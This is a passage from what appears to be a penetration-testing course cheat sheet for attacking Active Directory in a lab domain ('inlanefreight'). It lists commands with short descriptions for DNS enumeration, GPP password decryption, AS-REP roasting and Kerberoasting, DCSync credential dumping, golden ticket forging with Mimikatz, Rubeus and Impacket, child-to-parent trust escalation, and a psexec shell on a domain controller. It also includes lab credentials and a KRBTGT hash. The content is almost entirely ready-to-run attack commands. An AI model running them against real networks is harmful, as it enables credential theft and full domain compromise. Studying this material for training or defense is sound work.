adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 Used to resolve all records in a DNS zone over LDAP from a Linux-based host.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r Used to resolve unknown records in a DNS zone by performing an A query (-r) from a Linux-based host.
Get-DomainUser * \| Select-Object samaccountname,description PowerView tool used to display the description field of select objects (Select-Object) on a target Windows domain from a Windows-based host.
Get-DomainUser -UACFilter PASSWD_NOTREQD \| Select-Object samaccountname,useraccountcontrol PowerView tool used to check for the PASSWD_NOTREQD setting of select objects (Select-Object) on a target Windows domain from a Windows-based host.
ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts Used to list the contents of a share hosted on a Windows target from the context of a currently logged on user. Performed from a Windows-based host.

Group Policy Enumeration & Attacks


Command Description
gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE Tool used to decrypt a captured group policy preference password from a Linux-based host.
crackmapexec smb -L \| grep gpp Locates and retrieves a group policy preference password using CrackMapExec, the filters the output using grep. Peformed from a Linux-based host.
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin Locates and retrieves any credentials stored in the SYSVOL share of a Windows target using CrackMapExec from a Linux-based host.
Get-DomainGPO \| select displayname PowerView tool used to enumerate GPO names in a target Windows domain from a Windows-based host.
Get-GPO -All \| Select DisplayName PowerShell cmd-let used to enumerate GPO names. Performed from a Windows-based host.
$sid=Convert-NameToSid "Domain Users" Creates a variable called $sid that is set equal to the Convert-NameToSid tool and specifies the group account Domain Users. Performed from a Windows-based host.
Get-DomainGPO \| Get-ObjectAcl \| ?{$_.SecurityIdentifier -eq $sid PowerView tool that is used to check if the Domain Users (eq $sid) group has any rights over one or more GPOs. Performed from a Windows-based host.
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532 PowerShell cmd-let used to display the name of a GPO given a GUID. Performed from a Windows-based host.

ASREPRoasting


Command Description
Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl PowerView based tool used to search for the DONT_REQ_PREAUTH value across in user accounts in a target Windows domain. Performed from a Windows-based host.
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat Uses Rubeus to perform an ASEP Roasting attack and formats the output for Hashcat. Performed from a Windows-based host.
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt Uses Hashcat to attempt to crack the captured hash using a wordlist (rockyou.txt). Performed from a Linux-based host.
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt Enumerates users in a target Windows domain and automatically retrieves the AS for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host.

Trust Relationships - Child > Parent Trusts


Command Description
Import-Module activedirectory Used to import the Active Directory module. Performed from a Windows-based host.
Get-ADTrust -Filter * PowerShell cmd-let used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host.
Get-DomainTrust PowerView tool used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host.
Get-DomainTrustMapping PowerView tool used to perform a domain trust mapping from a Windows-based host.
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL \| select SamAccountName PowerView tools used to enumerate users in a target child domain from a Windows-based host.
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt Uses Mimikatz to obtain the KRBTGT account's NT Hash from a Windows-based host.
Get-DomainSID PowerView tool used to get the SID for a target child domain from a Windows-based host.
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" \| select distinguishedname,objectsid PowerView tool used to obtain the Enterprise Admins group's SID from a Windows-based host.
ls \\academy-ea-dc01.inlanefreight.local\c$ Used to attempt to list the contents of the C drive on a target Domain Controller. Performed from a Windows-based host.
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt Uses Mimikatz to create a Golden Ticket from a Windows-based host .
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt Uses Rubeus to create a Golden Ticket from a Windows-based host.
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm Uses Mimikatz to perform a DCSync attack from a Windows-based host.
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt Impacket tool used to perform a DCSync attack from a Linux-based host.
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 Impacket tool used to perform a SID Brute forcing attack from a Linux-based host.
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 \| grep "Domain SID" Impacket tool used to retrieve the SID of a target Windows domain from a Linux-based host.
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 \| grep -B12 "Enterprise Admins" Impacket tool used to retrieve the SID of a target Windows domain and attach it to the Enterprise Admin group's RID from a Linux-based host.
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker Impacket tool used to create a Golden Ticket from a Linux-based host.
export KRB5CCNAME=hacker.ccache Used to set the KRB5CCNAME Environment Variable from a Linux-based host.
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 Impacket tool used to establish a shell session with a target Domain Controller from a Linux-based host.
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm Impacket tool that automatically performs an attack that escalates from child to parent domain.

Trust Relationships - Cross-Forest


Command Description
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL \| select SamAccountName PowerView tool used to enumerate accounts for associated SPNs from a Windows-based host.
Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc \| select samaccountname,memberof PowerView tool used to enumerate the mssqlsvc account from a Windows-based host.
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap Uses Rubeus to perform a Kerberoasting Attack against a target Windows domain (/domain:FREIGHTLOGISTICS.local) from a Windows-based host.
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL PowerView tool used to enumerate groups with users that do not belong to the domain from a Windows-based host.
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator PowerShell cmd-let used to remotely connect to a target Windows system from a Windows-based host.
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley Impacket tool used to request (-request) the TGS ticket of an account in a target Windows domain (-target-domain) from a Linux-based host.
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2 Runs the Python implementation of BloodHound against a target Windows domain from a Linux-based host.
zip -r ilfreight_bh.zip *.json Used to compress multiple files into 1 single .zip file to be uploaded into the BloodHound GUI.